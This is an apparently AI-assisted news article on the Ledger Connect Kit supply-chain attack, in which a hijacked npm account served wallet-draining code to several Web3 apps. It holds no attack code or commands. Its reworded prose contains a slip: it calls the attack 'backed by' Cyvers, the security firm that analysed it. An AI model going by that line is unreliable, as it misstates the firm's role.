Ledger Hacker Exploits Web3 Apps, Draining Over $484,000 in Sneaky Scheme
Summary:
On December 14, a hacker managed to drain over $484,000 from several Web3 apps by tricking users into approving malicious token transactions. The hacker gained access to a former Ledger employee's node package manager javascript account and uploaded a harmful update to Ledger Connect’s GitHub repo, thus spreading the malicious code to users' browsers. Several Web3 apps including Zapper, SushiSwap, Phantom, Balancer, and Revoke.cash were infected. The Cyvers team suggests that the harmful code likely enabled the hacker to modify transactions within user wallets, resulting in erroneous approvals. The team stressed the importance of scrutinizing each transaction confirmation message to evade such attacks.
On December 14, a hacker identified as the 'Ledger hacker' managed to amass a minimum of $484,000 from an array of Web3 applications by duping users into sanctioning maleficent token approvals. The assault, backed by Cyvers, a blockchain security platform team, took place during the morning hours. The wrongdoer utilized a phishing manipulation to breach a former Ledger employee's computer, thereby securing admittance to the worker's node package manager javascript account. The malicious version of Ledger Connect Kit was noted and eradicated, with a legit version being instantly introduced.
Following this invasion, a detrimental update to the Ledger Connect's GitHub repo was uploaded. Ledger Connect is a frequent package for Web3 applications. Some of these upgraded apps unknowingly spread the malevolent code to users' browsers. Zapper, SushiSwap, Phantom, Balancer, and Revoke.cash, among other Web3 applications, were contaminated, through which the intruder was able to drain no less than $484,000. It is likely that other apps were also impacted, raising concerns across the entire Ethereum Virtual Machine ecosystem.
Cyvers' CEO Deddy Lavid, CTO Meir Dolev, and blockchain analyst Hakal Unal speculated on the realization of the attack, indicating that it seemed the culprit employed harmful code to demonstrate deceiving transaction details in user wallets, thereby tricking them into approving transactions they didn't mean to.
Open-source 'connect kits' are typically used by developers who create Web3 apps, facilitating the apps to link with user wallets. Ledger's connect kit is one such option. Following an app's creation via Node Package Manager, the app will contain the connect kit as part of its code, which is then downloaded to the user's browser when the site is visited.
The adverse code embedded within the Ledger Connect Kit presumably empowered the hacker to modify transactions pushed to the user's wallet. For instance, the harmful code may have triggered the user's wallet to reveal a token approval confirmation request bearing the attacker's address instead of the app's, leading users to unwittingly confirm transactions.
The Cyvers team cautioned that it's highly challenging to evade this kind of assault as wallets don't consistently provide users with comprehensible information about their actions. The team advised careful scrutiny of each transaction confirmation message while using an app, even if the transaction is displayed in code that's difficult to understand.
Their platform, according to Cyvers, enables businesses to ascertain if specific addresses have been implicated in security incidents. While they view future Web3 tools as potentially being equipped to detect and prevent such attacks, they acknowledged that there is still considerable work to be done.
Published At
12/15/2023 2:30:22 AM
Disclaimer: Algoine does not endorse any content or product on this page. Readers should conduct their own research before taking any actions related to the asset, company, or any information in this article and assume full responsibility for their decisions. This article should not be considered as investment advice. Our news is prepared with AI support.
Do you suspect this content may be misleading, incomplete, or inappropriate in any way, requiring modification or removal?
We appreciate your report.